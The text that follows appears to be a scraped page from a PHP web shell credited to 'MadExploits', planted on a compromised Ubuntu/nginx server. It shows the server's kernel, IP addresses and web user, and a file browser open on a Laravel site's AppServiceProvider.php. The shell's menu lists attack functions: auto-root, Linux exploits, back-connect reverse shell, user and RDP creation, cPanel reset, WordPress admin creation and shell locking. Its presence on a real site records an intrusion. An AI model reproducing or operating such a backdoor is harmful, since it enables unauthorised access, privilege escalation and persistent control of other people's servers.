Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya.biz /
amatya /
app /
Providers /
[ HOME SHELL ]
Name
Size
Permission
Action
AppServiceProvider.php
1.98
KB
-rwxrwxr-x
AuthServiceProvider.php
578
B
-rwxrwxr-x
BroadcastServiceProvider.php
380
B
-rwxrwxr-x
EventServiceProvider.php
710
B
-rwxrwxr-x
RouteServiceProvider.php
1.49
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AppServiceProvider.php
<?php namespace App\Providers; use App\User; use DB; use App\Menu; use App\Amatya; use App\Image; use Illuminate\Support\ServiceProvider; use Illuminate\Support\Facades\Schema; class AppServiceProvider extends ServiceProvider { /** * Register any application services. * * @return void */ public function register() { // } /** * Bootstrap any application services. * * @return void */ public function boot() { Schema::defaultStringLength(191); view()->composer('Backend.layout.sidebar', function ($view) { $menu = Menu::get(); $view->with('post',$menu); }); view()->composer('*',function($view){ $categories = Menu::orderBy('order_id')->where('parent_id', '=', 0)->get(); $allCategories = Menu::orderBy('order_id')->where('parent_id',0)->pluck('title','id'); $view->with('categories',$categories) ->with('allCategories',$allCategories); }); view()->composer('drac',function($view){ $drac = Amatya::get()->where('menu_id',6); if (\Request::is('drac')) { $view->with('drac',$drac); } }); } // public function show($id){ // $post = DB::table('menus')->where('id',$id)->get(); // foreach ($post as $id){ // $a=(unserialize($id->submenu_id)); // $sub = DB::table('submenus')->whereIn('id',$a)->get(); // echo $sub; // } // echo $sub; // public function index(){ // // DB::setFetchMode(PDO::FETCH_ASSOC); // // foreach ($post as $id){ // // $a=(unserialize($id->submenu_id)); // // $sub = DB::table('submenus')->whereIn('id',$a)->get(); // // echo $post; // // } // // $a=(unserialize('menu.submenu_id')); // // $post =DB::table('menus')->join('submenus',$a,'=','submenu.id')->get(); }
Close